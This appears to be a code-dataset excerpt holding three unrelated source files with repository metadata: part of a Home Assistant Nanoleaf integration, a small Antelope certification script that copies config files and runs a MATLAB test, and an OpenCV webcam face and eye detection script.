gesture_type = TOUCH_GESTURE_TRIGGER_MAP.get(event.gesture_id)
if gesture_type is None:
_LOGGER.warning(
"Received unknown touch gesture ID %s", event.gesture_id
)
return
_LOGGER.debug("Received touch gesture %s", gesture_type)
hass.bus.async_fire(
NANOLEAF_EVENT,
{CONF_DEVICE_ID: device_entry.id, CONF_TYPE: gesture_type},
)
event_listener = asyncio.create_task(
nanoleaf.listen_events(
state_callback=light_event_callback,
effects_callback=light_event_callback,
touch_callback=touch_event_callback if supports_touch else None,
)
)
hass.data.setdefault(DOMAIN, {})[entry.entry_id] = NanoleafEntryData(
nanoleaf, coordinator, event_listener
)
hass.config_entries.async_setup_platforms(entry, PLATFORMS)
return True
async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Unload a config entry."""
await hass.config_entries.async_unload_platforms(entry, PLATFORMS)
entry_data: NanoleafEntryData = hass.data[DOMAIN].pop(entry.entry_id)
entry_data.event_listener.cancel()
return True
| Python | 5 | liangleslie/core | homeassistant/components/nanoleaf/__init__.py | [
"Apache-2.0"
] |
unlink( "correct/rtrmatlab" );
if( system( "localmake_config matlab" ) ) {
system( "cp correct/rtrmatlab_disabled correct/rtrmatlab" );
exit( 0 );
} elsif( ! -e "$ENV{'ANTELOPE'}/setup.m" ) {
system( "cp correct/rtrmatlab_blank correct/rtrmatlab" );
exit( 0 );
}
system( "cp correct/rtrmatlab_enabled correct/rtrmatlab" );
system( "rtrun_matlab" );
exit( 0 );
| XProc | 3 | jreyes1108/antelope_contrib | bin/rt/rtrun_matlab/certify/try_rtrun_matlab.xpl | [
"BSD-2-Clause",
"MIT"
] |
## Name - Soumyajit Chakraborty
## place - kolkata
## date - 10 / 08 / 2020
import cv2 as cv
face_cascade = cv.CascadeClassifier("..\libs\haarcascade_frontalface_default.xml")
face_cascade_eye = cv.CascadeClassifier("..\libs\haarcascade_eye.xml")
# face_glass = cv.CascadeClassifier('..\libs\haarcascade_eye_tree_eyeglasses.xml')
cap = cv.VideoCapture(0)
while cap.isOpened():
falg, img = cap.read() # start reading the camera output i mean frames
# cap.read() returning a bool value and a frame onject type value
gray = cv.cvtColor(
img, cv.COLOR_BGR2GRAY
) # converting to grayscale image to perform smoother
faces = face_cascade.detectMultiScale(
img, 1.1, 7
) # we use detectMultiscale library function to detect the predefined structures of a face
eyes = face_cascade_eye.detectMultiScale(img, 1.1, 7)
# using for loops we are trying to read each and every frame and map
for (x, y, w, h) in faces:
cv.rectangle(img, (x, y), (x + w, y + h), (0, 255, 0), 1)
for (a, b, c, d) in eyes:
cv.rectangle(img, (a, b), (a + c, b + d), (255, 0, 0), 1)
cv.imshow("img", img)
c = cv.waitKey(1)
if c == ord("q"):
break
cv.release()
cv.destroyAllWindows()
| Python | 4 | Wish1991/Python | Face and eye Recognition/face_recofnation_first.py | [
"MIT"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.